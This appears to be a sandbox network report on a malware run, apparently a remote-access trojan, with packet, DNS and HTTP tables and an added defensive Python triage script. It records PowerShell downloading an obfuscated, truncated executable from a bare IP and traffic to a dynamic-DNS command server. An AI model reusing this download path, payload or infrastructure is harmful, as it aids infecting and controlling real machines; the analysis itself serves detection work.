                                                                                                      Nov 20, 2024 09:36:22.492839098 CET4434974752.217.196.57192.168.2.7
                                                                                                      Nov 20, 2024 09:36:22.492883921 CET49747443192.168.2.752.217.196.57
                                                                                                      Nov 20, 2024 09:36:22.493705034 CET4434974752.217.196.57192.168.2.7
                                                                                                      Nov 20, 2024 09:36:22.493727922 CET4434974752.217.196.57192.168.2.7
                                                                                                      Nov 20, 2024 09:36:22.493757963 CET49747443192.168.2.752.217.196.57
                                                                                                      Nov 20, 2024 09:36:22.493765116 CET4434974752.217.196.57192.168.2.7
                                                                                                      Nov 20, 2024 09:36:22.493778944 CET49747443192.168.2.752.217.196.57
                                                                                                      Nov 20, 2024 09:36:22.496970892 CET4434974752.217.196.57192.168.2.7
                                                                                                      Nov 20, 2024 09:36:22.496985912 CET4434974752.217.196.57192.168.2.7
                                                                                                      Nov 20, 2024 09:36:22.497035980 CET49747443192.168.2.752.217.196.57
                                                                                                      Nov 20, 2024 09:36:22.497046947 CET4434974752.217.196.57192.168.2.7
                                                                                                      Nov 20, 2024 09:36:22.497601032 CET4434974752.217.196.57192.168.2.7
                                                                                                      Nov 20, 2024 09:36:22.497621059 CET4434974752.217.196.57192.168.2.7
                                                                                                      Nov 20, 2024 09:36:22.497653008 CET49747443192.168.2.752.217.196.57
                                                                                                      Nov 20, 2024 09:36:22.497658968 CET4434974752.217.196.57192.168.2.7
                                                                                                      Nov 20, 2024 09:36:22.497674942 CET49747443192.168.2.752.217.196.57
                                                                                                      Nov 20, 2024 09:36:22.498122931 CET4434974752.217.196.57192.168.2.7
                                                                                                      Nov 20, 2024 09:36:22.498150110 CET4434974752.217.196.57192.168.2.7
                                                                                                      Nov 20, 2024 09:36:22.498174906 CET49747443192.168.2.752.217.196.57
                                                                                                      Nov 20, 2024 09:36:22.498181105 CET4434974752.217.196.57192.168.2.7
                                                                                                      Nov 20, 2024 09:36:22.498193026 CET49747443192.168.2.752.217.196.57
                                                                                                      Nov 20, 2024 09:36:22.542505026 CET49747443192.168.2.752.217.196.57
                                                                                                      Nov 20, 2024 09:36:22.578361988 CET4434974752.217.196.57192.168.2.7
                                                                                                      Nov 20, 2024 09:36:22.578387022 CET4434974752.217.196.57192.168.2.7
                                                                                                      Nov 20, 2024 09:36:22.578413010 CET4434974752.217.196.57192.168.2.7
                                                                                                      Nov 20, 2024 09:36:22.578453064 CET49747443192.168.2.752.217.196.57
                                                                                                      Nov 20, 2024 09:36:22.578469992 CET4434974752.217.196.57192.168.2.7
                                                                                                      Nov 20, 2024 09:36:22.578486919 CET49747443192.168.2.752.217.196.57
                                                                                                      Nov 20, 2024 09:36:22.578928947 CET4434974752.217.196.57192.168.2.7
                                                                                                      Nov 20, 2024 09:36:22.578948021 CET4434974752.217.196.57192.168.2.7
                                                                                                      Nov 20, 2024 09:36:22.578979969 CET49747443192.168.2.752.217.196.57
                                                                                                      Nov 20, 2024 09:36:22.578984976 CET4434974752.217.196.57192.168.2.7
                                                                                                      Nov 20, 2024 09:36:22.579013109 CET49747443192.168.2.752.217.196.57
                                                                                                      Nov 20, 2024 09:36:22.579543114 CET4434974752.217.196.57192.168.2.7
                                                                                                      Nov 20, 2024 09:36:22.579557896 CET4434974752.217.196.57192.168.2.7
                                                                                                      Nov 20, 2024 09:36:22.579607964 CET49747443192.168.2.752.217.196.57
                                                                                                      Nov 20, 2024 09:36:22.579617023 CET4434974752.217.196.57192.168.2.7
                                                                                                      Nov 20, 2024 09:36:22.580076933 CET4434974752.217.196.57192.168.2.7
                                                                                                      Nov 20, 2024 09:36:22.580095053 CET4434974752.217.196.57192.168.2.7
Nov 20, 2024 09:36:22.580123901 CET | 49747 | 443 | 192.168.2.7 | 52.217.196.57
Nov 20, 2024 09:36:22.580130100 CET | 443 | 49747 | 52.217.196.57 | 192.168.2.7
Nov 20, 2024 09:36:22.580147982 CET | 49747 | 443 | 192.168.2.7 | 52.217.196.57
Nov 20, 2024 09:36:22.580343962 CET | 443 | 49747 | 52.217.196.57 | 192.168.2.7
Nov 20, 2024 09:36:22.580374956 CET | 443 | 49747 | 52.217.196.57 | 192.168.2.7
Nov 20, 2024 09:36:22.580401897 CET | 49747 | 443 | 192.168.2.7 | 52.217.196.57
Nov 20, 2024 09:36:22.580408096 CET | 443 | 49747 | 52.217.196.57 | 192.168.2.7
Nov 20, 2024 09:36:22.580431938 CET | 49747 | 443 | 192.168.2.7 | 52.217.196.57
Nov 20, 2024 09:36:22.580456018 CET | 49747 | 443 | 192.168.2.7 | 52.217.196.57
Nov 20, 2024 09:36:22.581090927 CET | 443 | 49747 | 52.217.196.57 | 192.168.2.7
Nov 20, 2024 09:36:22.581110001 CET | 443 | 49747 | 52.217.196.57 | 192.168.2.7
Nov 20, 2024 09:36:22.581151962 CET | 443 | 49747 | 52.217.196.57 | 192.168.2.7
Nov 20, 2024 09:36:22.581155062 CET | 49747 | 443 | 192.168.2.7 | 52.217.196.57
Nov 20, 2024 09:36:22.581165075 CET | 443 | 49747 | 52.217.196.57 | 192.168.2.7
Nov 20, 2024 09:36:22.581183910 CET | 49747 | 443 | 192.168.2.7 | 52.217.196.57
Nov 20, 2024 09:36:22.582017899 CET | 443 | 49747 | 52.217.196.57 | 192.168.2.7
Nov 20, 2024 09:36:22.582041025 CET | 443 | 49747 | 52.217.196.57 | 192.168.2.7
Nov 20, 2024 09:36:22.582070112 CET | 49747 | 443 | 192.168.2.7 | 52.217.196.57
Nov 20, 2024 09:36:22.582076073 CET | 443 | 49747 | 52.217.196.57 | 192.168.2.7
Nov 20, 2024 09:36:22.582098007 CET | 49747 | 443 | 192.168.2.7 | 52.217.196.57
Nov 20, 2024 09:36:22.582118988 CET | 443 | 49747 | 52.217.196.57 | 192.168.2.7
Nov 20, 2024 09:36:22.582149982 CET | 443 | 49747 | 52.217.196.57 | 192.168.2.7
Nov 20, 2024 09:36:22.582170010 CET | 49747 | 443 | 192.168.2.7 | 52.217.196.57
Nov 20, 2024 09:36:22.582178116 CET | 443 | 49747 | 52.217.196.57 | 192.168.2.7
Nov 20, 2024 09:36:22.582199097 CET | 49747 | 443 | 192.168.2.7 | 52.217.196.57
Nov 20, 2024 09:36:22.582226038 CET | 49747 | 443 | 192.168.2.7 | 52.217.196.57
Nov 20, 2024 09:36:22.665532112 CET | 443 | 49747 | 52.217.196.57 | 192.168.2.7
Nov 20, 2024 09:36:22.665554047 CET | 443 | 49747 | 52.217.196.57 | 192.168.2.7
Nov 20, 2024 09:36:22.665595055 CET | 443 | 49747 | 52.217.196.57 | 192.168.2.7
Nov 20, 2024 09:36:22.665714025 CET | 49747 | 443 | 192.168.2.7 | 52.217.196.57
Nov 20, 2024 09:36:22.665738106 CET | 443 | 49747 | 52.217.196.57 | 192.168.2.7
Nov 20, 2024 09:36:22.665749073 CET | 49747 | 443 | 192.168.2.7 | 52.217.196.57
Nov 20, 2024 09:36:22.666115999 CET | 443 | 49747 | 52.217.196.57 | 192.168.2.7
Nov 20, 2024 09:36:22.666136980 CET | 443 | 49747 | 52.217.196.57 | 192.168.2.7
Nov 20, 2024 09:36:22.666174889 CET | 49747 | 443 | 192.168.2.7 | 52.217.196.57
Nov 20, 2024 09:36:22.666182995 CET | 443 | 49747 | 52.217.196.57 | 192.168.2.7
Nov 20, 2024 09:36:22.666217089 CET | 49747 | 443 | 192.168.2.7 | 52.217.196.57
Nov 20, 2024 09:36:22.666975975 CET | 443 | 49747 | 52.217.196.57 | 192.168.2.7
Nov 20, 2024 09:36:22.667012930 CET | 443 | 49747 | 52.217.196.57 | 192.168.2.7
Nov 20, 2024 09:36:22.667046070 CET | 49747 | 443 | 192.168.2.7 | 52.217.196.57
Nov 20, 2024 09:36:22.667053938 CET | 443 | 49747 | 52.217.196.57 | 192.168.2.7
Nov 20, 2024 09:36:22.667084932 CET | 49747 | 443 | 192.168.2.7 | 52.217.196.57
Nov 20, 2024 09:36:22.667113066 CET | 49747 | 443 | 192.168.2.7 | 52.217.196.57
Nov 20, 2024 09:36:22.667855024 CET | 443 | 49747 | 52.217.196.57 | 192.168.2.7
Nov 20, 2024 09:36:22.667874098 CET | 443 | 49747 | 52.217.196.57 | 192.168.2.7
Nov 20, 2024 09:36:22.667912006 CET | 49747 | 443 | 192.168.2.7 | 52.217.196.57
Nov 20, 2024 09:36:22.667920113 CET | 443 | 49747 | 52.217.196.57 | 192.168.2.7
Nov 20, 2024 09:36:22.667943954 CET | 49747 | 443 | 192.168.2.7 | 52.217.196.57
Nov 20, 2024 09:36:22.667949915 CET | 443 | 49747 | 52.217.196.57 | 192.168.2.7
Nov 20, 2024 09:36:22.667963982 CET | 49747 | 443 | 192.168.2.7 | 52.217.196.57
Nov 20, 2024 09:36:22.667974949 CET | 443 | 49747 | 52.217.196.57 | 192.168.2.7
Nov 20, 2024 09:36:22.667985916 CET | 443 | 49747 | 52.217.196.57 | 192.168.2.7
Nov 20, 2024 09:36:22.668003082 CET | 49747 | 443 | 192.168.2.7 | 52.217.196.57
Nov 20, 2024 09:36:22.668034077 CET | 49747 | 443 | 192.168.2.7 | 52.217.196.57
Nov 20, 2024 09:36:22.668041945 CET | 443 | 49747 | 52.217.196.57 | 192.168.2.7
Nov 20, 2024 09:36:22.668936014 CET | 443 | 49747 | 52.217.196.57 | 192.168.2.7
Nov 20, 2024 09:36:22.668950081 CET | 443 | 49747 | 52.217.196.57 | 192.168.2.7
Nov 20, 2024 09:36:22.669003010 CET | 49747 | 443 | 192.168.2.7 | 52.217.196.57
Nov 20, 2024 09:36:22.669009924 CET | 443 | 49747 | 52.217.196.57 | 192.168.2.7
Nov 20, 2024 09:36:22.669692039 CET | 443 | 49747 | 52.217.196.57 | 192.168.2.7
Nov 20, 2024 09:36:22.669714928 CET | 443 | 49747 | 52.217.196.57 | 192.168.2.7
Nov 20, 2024 09:36:22.669755936 CET | 49747 | 443 | 192.168.2.7 | 52.217.196.57
Nov 20, 2024 09:36:22.669763088 CET | 443 | 49747 | 52.217.196.57 | 192.168.2.7
Nov 20, 2024 09:36:22.669779062 CET | 49747 | 443 | 192.168.2.7 | 52.217.196.57
Nov 20, 2024 09:36:22.714339972 CET | 49747 | 443 | 192.168.2.7 | 52.217.196.57
Nov 20, 2024 09:36:22.751955032 CET | 443 | 49747 | 52.217.196.57 | 192.168.2.7
Nov 20, 2024 09:36:22.751976013 CET | 443 | 49747 | 52.217.196.57 | 192.168.2.7
Nov 20, 2024 09:36:22.752182961 CET | 443 | 49747 | 52.217.196.57 | 192.168.2.7
Nov 20, 2024 09:36:22.752206087 CET | 49747 | 443 | 192.168.2.7 | 52.217.196.57
Nov 20, 2024 09:36:22.752213001 CET | 443 | 49747 | 52.217.196.57 | 192.168.2.7
Nov 20, 2024 09:36:22.752235889 CET | 49747 | 443 | 192.168.2.7 | 52.217.196.57
Nov 20, 2024 09:36:22.752553940 CET | 443 | 49747 | 52.217.196.57 | 192.168.2.7
Nov 20, 2024 09:36:22.752576113 CET | 443 | 49747 | 52.217.196.57 | 192.168.2.7
Nov 20, 2024 09:36:22.752651930 CET | 49747 | 443 | 192.168.2.7 | 52.217.196.57
Nov 20, 2024 09:36:22.752660036 CET | 443 | 49747 | 52.217.196.57 | 192.168.2.7
Nov 20, 2024 09:36:22.752712965 CET | 443 | 49747 | 52.217.196.57 | 192.168.2.7
Nov 20, 2024 09:36:22.752758980 CET | 49747 | 443 | 192.168.2.7 | 52.217.196.57
Nov 20, 2024 09:36:22.752763987 CET | 443 | 49747 | 52.217.196.57 | 192.168.2.7
Nov 20, 2024 09:36:22.752779961 CET | 443 | 49747 | 52.217.196.57 | 192.168.2.7
Nov 20, 2024 09:36:22.752800941 CET | 49747 | 443 | 192.168.2.7 | 52.217.196.57
Nov 20, 2024 09:36:22.752835035 CET | 49747 | 443 | 192.168.2.7 | 52.217.196.57
Nov 20, 2024 09:36:22.753067017 CET | 49747 | 443 | 192.168.2.7 | 52.217.196.57
Nov 20, 2024 09:36:22.871296883 CET | 49726 | 80 | 192.168.2.7 | 91.202.233.169
Nov 20, 2024 09:36:23.021962881 CET | 49759 | 4576 | 192.168.2.7 | 190.9.223.135
Nov 20, 2024 09:36:23.030755043 CET | 4576 | 49759 | 190.9.223.135 | 192.168.2.7
Nov 20, 2024 09:36:23.030886889 CET | 49759 | 4576 | 192.168.2.7 | 190.9.223.135
Nov 20, 2024 09:36:23.038522005 CET | 49759 | 4576 | 192.168.2.7 | 190.9.223.135
Nov 20, 2024 09:36:23.046293020 CET | 4576 | 49759 | 190.9.223.135 | 192.168.2.7
Nov 20, 2024 09:36:23.660923958 CET | 4576 | 49759 | 190.9.223.135 | 192.168.2.7
Nov 20, 2024 09:36:23.714286089 CET | 49759 | 4576 | 192.168.2.7 | 190.9.223.135
Nov 20, 2024 09:36:23.805701017 CET | 4576 | 49759 | 190.9.223.135 | 192.168.2.7
Nov 20, 2024 09:36:23.810944080 CET | 49759 | 4576 | 192.168.2.7 | 190.9.223.135
Nov 20, 2024 09:36:23.819008112 CET | 4576 | 49759 | 190.9.223.135 | 192.168.2.7
Nov 20, 2024 09:36:23.819139957 CET | 49759 | 4576 | 192.168.2.7 | 190.9.223.135
Nov 20, 2024 09:36:23.826992989 CET | 4576 | 49759 | 190.9.223.135 | 192.168.2.7
Nov 20, 2024 09:36:24.132555962 CET | 4576 | 49759 | 190.9.223.135 | 192.168.2.7
Nov 20, 2024 09:36:24.134217024 CET | 49759 | 4576 | 192.168.2.7 | 190.9.223.135
Nov 20, 2024 09:36:24.141613007 CET | 4576 | 49759 | 190.9.223.135 | 192.168.2.7
Nov 20, 2024 09:36:24.258677006 CET | 4576 | 49759 | 190.9.223.135 | 192.168.2.7
Nov 20, 2024 09:36:24.308034897 CET | 49759 | 4576 | 192.168.2.7 | 190.9.223.135
Nov 20, 2024 09:36:24.344582081 CET | 49769 | 80 | 192.168.2.7 | 178.237.33.50
Nov 20, 2024 09:36:24.349914074 CET | 80 | 49769 | 178.237.33.50 | 192.168.2.7
Nov 20, 2024 09:36:24.349987030 CET | 49769 | 80 | 192.168.2.7 | 178.237.33.50
Nov 20, 2024 09:36:24.350171089 CET | 49769 | 80 | 192.168.2.7 | 178.237.33.50
Nov 20, 2024 09:36:24.355170965 CET | 80 | 49769 | 178.237.33.50 | 192.168.2.7
Nov 20, 2024 09:36:24.973278046 CET | 80 | 49769 | 178.237.33.50 | 192.168.2.7
Nov 20, 2024 09:36:24.973347902 CET | 49769 | 80 | 192.168.2.7 | 178.237.33.50
Nov 20, 2024 09:36:24.982755899 CET | 49759 | 4576 | 192.168.2.7 | 190.9.223.135
Nov 20, 2024 09:36:24.991451025 CET | 4576 | 49759 | 190.9.223.135 | 192.168.2.7
Nov 20, 2024 09:36:25.973086119 CET | 80 | 49769 | 178.237.33.50 | 192.168.2.7
Nov 20, 2024 09:36:25.973164082 CET | 49769 | 80 | 192.168.2.7 | 178.237.33.50
Nov 20, 2024 09:36:26.083529949 CET | 4576 | 49759 | 190.9.223.135 | 192.168.2.7
Nov 20, 2024 09:36:26.091207981 CET | 49759 | 4576 | 192.168.2.7 | 190.9.223.135
Nov 20, 2024 09:36:26.096128941 CET | 4576 | 49759 | 190.9.223.135 | 192.168.2.7
Nov 20, 2024 09:37:11.236579895 CET | 4576 | 49759 | 190.9.223.135 | 192.168.2.7
Nov 20, 2024 09:37:11.238027096 CET | 49759 | 4576 | 192.168.2.7 | 190.9.223.135
Nov 20, 2024 09:37:11.242959976 CET | 4576 | 49759 | 190.9.223.135 | 192.168.2.7
Nov 20, 2024 09:37:56.507625103 CET | 4576 | 49759 | 190.9.223.135 | 192.168.2.7
Nov 20, 2024 09:37:56.509004116 CET | 49759 | 4576 | 192.168.2.7 | 190.9.223.135
Nov 20, 2024 09:37:56.516257048 CET | 4576 | 49759 | 190.9.223.135 | 192.168.2.7
Nov 20, 2024 09:38:14.308892965 CET | 49769 | 80 | 192.168.2.7 | 178.237.33.50
Nov 20, 2024 09:38:14.731344938 CET | 49769 | 80 | 192.168.2.7 | 178.237.33.50
Nov 20, 2024 09:38:15.340897083 CET | 49769 | 80 | 192.168.2.7 | 178.237.33.50
Nov 20, 2024 09:38:16.542912960 CET | 49769 | 80 | 192.168.2.7 | 178.237.33.50
Nov 20, 2024 09:38:18.949162006 CET | 49769 | 80 | 192.168.2.7 | 178.237.33.50
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 20, 2024 09:36:20.182653904 CET | 64059 | 53 | 192.168.2.7 | 1.1.1.1
Nov 20, 2024 09:36:20.189412117 CET | 53 | 64059 | 1.1.1.1 | 192.168.2.7
Nov 20, 2024 09:36:21.390454054 CET | 62353 | 53 | 192.168.2.7 | 1.1.1.1
Nov 20, 2024 09:36:21.419483900 CET | 53 | 62353 | 1.1.1.1 | 192.168.2.7
Nov 20, 2024 09:36:22.893431902 CET | 56012 | 53 | 192.168.2.7 | 1.1.1.1
Nov 20, 2024 09:36:22.996946096 CET | 53 | 56012 | 1.1.1.1 | 192.168.2.7
Nov 20, 2024 09:36:24.324858904 CET | 63096 | 53 | 192.168.2.7 | 1.1.1.1
Nov 20, 2024 09:36:24.336985111 CET | 53 | 63096 | 1.1.1.1 | 192.168.2.7
Nov 20, 2024 09:36:36.852986097 CET | 58411 | 53 | 192.168.2.7 | 1.1.1.1
Nov 20, 2024 09:36:36.862502098 CET | 53 | 58411 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 20, 2024 09:36:20.182653904 CET | 192.168.2.7 | 1.1.1.1 | 0x533f | Standard query (0) | bitbucket.org | A (IP address) | IN (0x0001) | false
Nov 20, 2024 09:36:21.390454054 CET | 192.168.2.7 | 1.1.1.1 | 0x3efc | Standard query (0) | bbuseruploads.s3.amazonaws.com | A (IP address) | IN (0x0001) | false
Nov 20, 2024 09:36:22.893431902 CET | 192.168.2.7 | 1.1.1.1 | 0x479b | Standard query (0) | remcosnov24.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 20, 2024 09:36:24.324858904 CET | 192.168.2.7 | 1.1.1.1 | 0xa66e | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Nov 20, 2024 09:36:36.852986097 CET | 192.168.2.7 | 1.1.1.1 | 0x9c39 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 20, 2024 09:36:20.189412117 CET | 1.1.1.1 | 192.168.2.7 | 0x533f | No error (0) | bitbucket.org | - | 185.166.143.49 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 09:36:20.189412117 CET | 1.1.1.1 | 192.168.2.7 | 0x533f | No error (0) | bitbucket.org | - | 185.166.143.50 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 09:36:20.189412117 CET | 1.1.1.1 | 192.168.2.7 | 0x533f | No error (0) | bitbucket.org | - | 185.166.143.48 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 09:36:21.419483900 CET | 1.1.1.1 | 192.168.2.7 | 0x3efc | No error (0) | bbuseruploads.s3.amazonaws.com | s3-1-w.amazonaws.com | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 20, 2024 09:36:21.419483900 CET | 1.1.1.1 | 192.168.2.7 | 0x3efc | No error (0) | s3-1-w.amazonaws.com | s3-w.us-east-1.amazonaws.com | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 20, 2024 09:36:21.419483900 CET | 1.1.1.1 | 192.168.2.7 | 0x3efc | No error (0) | s3-w.us-east-1.amazonaws.com | - | 52.217.196.57 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 09:36:21.419483900 CET | 1.1.1.1 | 192.168.2.7 | 0x3efc | No error (0) | s3-w.us-east-1.amazonaws.com | - | 3.5.25.108 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 09:36:21.419483900 CET | 1.1.1.1 | 192.168.2.7 | 0x3efc | No error (0) | s3-w.us-east-1.amazonaws.com | - | 52.217.107.148 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 09:36:21.419483900 CET | 1.1.1.1 | 192.168.2.7 | 0x3efc | No error (0) | s3-w.us-east-1.amazonaws.com | - | 54.231.196.81 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 09:36:21.419483900 CET | 1.1.1.1 | 192.168.2.7 | 0x3efc | No error (0) | s3-w.us-east-1.amazonaws.com | - | 3.5.30.217 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 09:36:21.419483900 CET | 1.1.1.1 | 192.168.2.7 | 0x3efc | No error (0) | s3-w.us-east-1.amazonaws.com | - | 52.217.123.1 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 09:36:21.419483900 CET | 1.1.1.1 | 192.168.2.7 | 0x3efc | No error (0) | s3-w.us-east-1.amazonaws.com | - | 3.5.25.80 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 09:36:21.419483900 CET | 1.1.1.1 | 192.168.2.7 | 0x3efc | No error (0) | s3-w.us-east-1.amazonaws.com | - | 3.5.28.22 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 09:36:22.996946096 CET | 1.1.1.1 | 192.168.2.7 | 0x479b | No error (0) | remcosnov24.duckdns.org | - | 190.9.223.135 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 09:36:24.336985111 CET | 1.1.1.1 | 192.168.2.7 | 0xa66e | No error (0) | geoplugin.net | - | 178.237.33.50 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 09:36:36.862502098 CET | 1.1.1.1 | 192.168.2.7 | 0x9c39 | No error (0) | geoplugin.net | - | 178.237.33.50 | A (IP address) | IN (0x0001) | false
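The tables above line up the way a triage script would want to read them: a dynamic-DNS name (remcosnov24.duckdns.org) is resolved and the host immediately opens a TCP session to the answer, 190.9.223.135, on port 4576, then looks up geoplugin.net, while the dll.txt download went to a bare IP (91.202.233.169) that was never resolved. The following Python is an added example, not Joe Sandbox code, that correlates DNS answers with outbound flows and emits those three flags. The sample rows are constructed from this report's DNS answer, TCP packet and HTTP session tables (one row per flow, with only the first 52.217.196.57 A record kept); the dynamic-DNS suffixes other than duckdns.org, the geolocation-service list and the "expected" port set are assumptions a deployment would tune.

```python
"""Correlate DNS answers with outbound TCP flows (added example, not sandbox code)."""
from collections import defaultdict

# Constructed rows; values copied from this report's DNS answer and TCP/HTTP tables.
DNS_ANSWERS = [
    # (name, record type, rdata)
    ("bitbucket.org", "A", "185.166.143.49"),
    ("bbuseruploads.s3.amazonaws.com", "CNAME", "s3-1-w.amazonaws.com"),
    ("s3-1-w.amazonaws.com", "CNAME", "s3-w.us-east-1.amazonaws.com"),
    ("s3-w.us-east-1.amazonaws.com", "A", "52.217.196.57"),
    ("remcosnov24.duckdns.org", "A", "190.9.223.135"),
    ("geoplugin.net", "A", "178.237.33.50"),
]
TCP_FLOWS = [
    # (src_port, dst_port, src_ip, dst_ip): first packet of each outbound flow
    (49699, 80, "192.168.2.7", "91.202.233.169"),   # dll.txt fetch by powershell.exe
    (49747, 443, "192.168.2.7", "52.217.196.57"),   # bitbucket user-uploads bucket
    (49759, 4576, "192.168.2.7", "190.9.223.135"),  # remcosnov24.duckdns.org
    (49769, 80, "192.168.2.7", "178.237.33.50"),    # geoplugin.net
]

# duckdns.org and geoplugin.net appear in this report; the other entries are an
# assumed watch-list, as is the set of ports treated as unremarkable.
DYNDNS_SUFFIXES = ("duckdns.org", "no-ip.org", "ddns.net")
GEO_SERVICES = ("geoplugin.net",)
EXPECTED_PORTS = {80, 443}


def build_reverse_map(answers):
    """Map each resolved IP back to every name that led to it, walking CNAME chains backwards."""
    cname = {name: target for name, rtype, target in answers if rtype == "CNAME"}
    by_ip = defaultdict(set)
    for name, rtype, rdata in answers:
        if rtype != "A":
            continue
        by_ip[rdata].add(name)
        frontier = [name]
        while frontier:  # any owner whose CNAME points at a known name also maps to this IP
            target = frontier.pop()
            for owner, tgt in cname.items():
                if tgt == target and owner not in by_ip[rdata]:
                    by_ip[rdata].add(owner)
                    frontier.append(owner)
    return by_ip


def has_suffix(name, suffixes):
    return any(name == s or name.endswith("." + s) for s in suffixes)


def correlate(answers, flows, client_ip):
    """Return one finding per outbound flow: destination, names that resolved to it, reasons."""
    by_ip = build_reverse_map(answers)
    findings = []
    for _src_port, dst_port, src_ip, dst_ip in flows:
        if src_ip != client_ip:
            continue
        names = sorted(by_ip.get(dst_ip, ()))
        reasons = []
        if not names:
            reasons.append("no-dns-name")        # hard-coded IP, no lookup preceded the flow
        if any(has_suffix(n, DYNDNS_SUFFIXES) for n in names):
            reasons.append("dynamic-dns")
        if any(has_suffix(n, GEO_SERVICES) for n in names):
            reasons.append("geolocation-lookup")
        if dst_port not in EXPECTED_PORTS:
            reasons.append("non-standard-port")
        findings.append({"dst": f"{dst_ip}:{dst_port}", "names": names, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in correlate(DNS_ANSWERS, TCP_FLOWS, "192.168.2.7"):
        print(f["dst"], f["names"], f["reasons"])
```

The CNAME walk matters for the S3 flow: the packets go to 52.217.196.57, which only the last hop of the chain names, so without it the bucket name bbuseruploads.s3.amazonaws.com would never be tied to the connection.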
                                                                                                      • bitbucket.org
                                                                                                      • bbuseruploads.s3.amazonaws.com
                                                                                                      • 91.202.233.169
                                                                                                      • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49699 | 91.202.233.169 | 80 | 7104 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 09:36:10.150357008 CET | 190 | OUT | GET /Tak/Reg/Marz/DRG/RTC/AD/dll.txt HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: 91.202.233.169
    Connection: Keep-Alive
Nov 20, 2024 09:36:10.858876944 CET | 1236 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.2
    Date: Wed, 20 Nov 2024 08:36:10 GMT
    Content-Type: text/plain
    Content-Length: 106572
    Connection: keep-alive
    Last-Modified: Thu, 31 Oct 2024 04:54:03 GMT
    ETag: "1a04c-625be9b7df0c0"
    Accept-Ranges: bytes
    Vary: Accept-Encoding
                                                                                                      Data Raw: 54 56 71 51 24 24 24 24 4d 24 24 24 24 24 24 24 24 45 24 24 24 24 24 24 24 24 2f 2f 38 24 24 24 24 4c 67 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 51 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 67 24 24 24 24 24 24 24 24 24 24 34 66 75 67 34 24 24 74 24 24 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 42 51 52 51 24 24 24 24 54 24 24 45 44 24 24 48 76 56 49 6d 63 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 4f 24 24 24 24 49 69 24 24 4c 24 24 56 24 24 24 24 24 24 4f 77 24 24 24 24 24 24 24 24 47 24 24 24 24 24 24 24 24 24 24 24 24 24 [TRUNCATED]
                                                                                                      Data Ascii: TVqQ$$$$M$$$$$$$$E$$$$$$$$//8$$$$Lg$$$$$$$$$$$$$$$$$$Q$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$g$$$$$$$$$$4fug4$$t$$nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ$$$$$$$$$$$$$$$$$$BQRQ$$$$T$$ED$$HvVImc$$$$$$$$$$$$$$$$$$$$O$$$$Ii$$L$$V$$$$$$Ow$$$$$$$$G$$$$$$$$$$$$$$$$bgoB$$$$$$g$$$$$$$$$$$$$$$$$$$$$$$$E$$$$g$$$$$$$$$$g$$$$B$$$$$$$$$$$$$$$$$$$$G$$$$$$$$$$$$$$$$$$$$Bg$$Q$$$$$$g$$$$$$$$$$$$$$$$M$$YIU$$$$B$$$$$$B$$$$$$$$$$$$E$$$$$$E$$$$$$$$$$$$$$$$B$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$BgK$$QBT$$$$$$$$$$C$$B$$$$$$E$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$E$$B$$$$w$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$I$$$$$$C$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$CC$$$$$$Eg$$$$$$$$$$$$$$$$$$$$$$$$$$$$C50ZXh0$$$$$$$$dOo$$$$$$$$g$$$$$$$$7$$$$$$$$$$I$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$C$$$$$$G$$ucnNyYw$$$$$$$$$$
